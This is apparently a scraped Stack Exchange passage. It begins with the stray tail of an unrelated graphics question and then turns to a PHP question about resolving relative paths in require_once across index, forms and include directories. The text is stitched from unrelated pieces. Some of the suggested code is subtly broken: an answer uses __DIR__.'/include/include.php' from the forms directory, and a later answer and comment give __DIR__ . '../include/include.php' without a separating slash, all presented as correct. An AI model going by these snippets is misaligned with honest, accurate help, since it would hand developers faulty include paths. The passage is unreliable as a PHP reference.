x 500 square centered in the output screen) of the game screen. P.S: Maybe it would be better if you could add more details about the graphics library you are using. Well the red was suppose to be another screen behind it.
common-pile/stackexchange_filtered
PHP file inclusion on a required file Here is an example directory structure: -Root index.php -forms -form.php -include -include.php In my index.php I am requiring the form.php require_once('forms/form.php'); in my form.php I am requiring the include.php file. Which of the following is correct: require_once('../include/include.php'); require_once('include/include.php'); My confusion comes from the idea that the form is being rendered in the index file, so would the files the form include need to be relative from the index (since that is where its rendered) or would it need to be relative to itself regardless of where it is rendered. You can, very primitively, think of require as roughly the same as eval(file_get_contents(...)) - it keeps the current context, which includes the current working directory. Just don't include files like that... the moment your codebase reaches a certain degree of complexity, it'll be almost impossible to know what path to use, when and where. Use set_include_path and define a constant like PROJECT_ROOT, and use paths relative to that constant path Correct is require_once('include/include.php'); but it is beter to use absolute path: require_once(__DIR__.'/include/include.php'); __DIR__ works from PHP 5.3.0 up. In earler versions its equivalent was dirname(__FILE__) ../include/include.php Not correct! Because it goes from the index file! so the other one would be correct! Just test it and you will see it too oops, sorry, haven't noticed that, thank you, I tried to be quicker than you :) Thanks for including the better way to do it instead of just answering. I was able to get it to work using 'include/include.php'. You can use the magic constant __DIR__, so you don't have to think about this, e.g. require_once(__DIR__ . '../include/include.php'); Shouldn't it be require_once(__DIR__ . '../include/include.php'); since form.php is inside the forms directory which is a "sibling" to the include directory?
common-pile/stackexchange_filtered